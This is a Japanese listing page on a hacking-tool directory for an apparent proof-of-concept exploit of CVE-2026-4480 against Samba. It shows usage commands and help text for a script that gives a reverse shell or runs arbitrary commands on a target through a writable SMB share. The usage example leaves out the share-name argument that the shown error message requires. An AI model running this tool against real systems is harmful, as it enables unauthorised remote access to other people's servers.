Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/vusal777/cve-2026-4480-exploit-poc
ペイロード生成脆弱性分析エクスプロイトペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubvusal777/cve-2026-4480-exploit-poc

CVE-2026-4480-exploit-poc

これはCVE-2026-4480のエクスプロイトPoCです。

リポジトリを見る
12ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

使用方法:

匿名ログインの場合:

python3 exploit.py --lhost <listenerhost> --lport <listenerport> -t <target> -N (it is for anonymous login)

認証情報を使用したログイン:

python3 exploit.py --lhost <listenerhost> --lport <listenerport> -t <target> -u <username> -p <password>

root@kitploit:~
[!] Error: the following arguments are required: -s/--sharename
[*] Note: if user is anonymous and no password, then just add -N without -u or -p

##### Usage:
exploit.py [-h] -t TARGET -Lh LHOST -Lp LPORT -s SHARENAME [-c CMD] (-N | -u USERNAME) [-p PASSWORD]
options:
-h, --help            show this help message and exit
-t, --target TARGET   target Samba host/IP (rhost)
-Lh, --lhost LHOST    your listener IP (e.g. tun0)
-Lp, --lport LPORT    your listener port
-s, --sharename SHARENAME (Writable SMB share / printer name)
-c, --cmd CMD         run a specific shell command instead of a reverse shell
-N, --no-pass         Anonymous / guest login
-u, --username USERNAME (Username for authentication)
-p, --password PASSWORD (Password for authentication)```
ツールをダウンロード